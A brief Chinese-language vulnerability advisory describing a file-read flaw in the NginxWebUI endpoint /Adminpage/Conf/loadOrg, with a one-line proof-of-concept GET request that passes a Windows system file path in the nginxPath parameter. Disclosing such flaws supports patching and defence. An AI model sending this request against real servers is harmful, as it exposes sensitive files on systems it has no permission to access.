NginxWebUI /Adminpage/Conf/loadOrg 文件读取漏洞

2026-07-24 NginxWebUI PoC Public

Description

NginxWebUI 是一款面向 Nginx 服务管理的 Web 可视化运维工具,提供站点配置、证书管理、反向代理、负载均衡、远程管理和在线发布等功能,常用于服务器 Nginx 配置集中化管理场景。NginxWebUI /Adminpage/Conf/loadOrg 接口存在文件读取漏洞,攻击者可通过该接口读取服务器敏感文件,造成敏感信息泄露。

PoC

GET /Adminpage/Conf/loadOrg?nginxPath=C://windows//win.ini HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities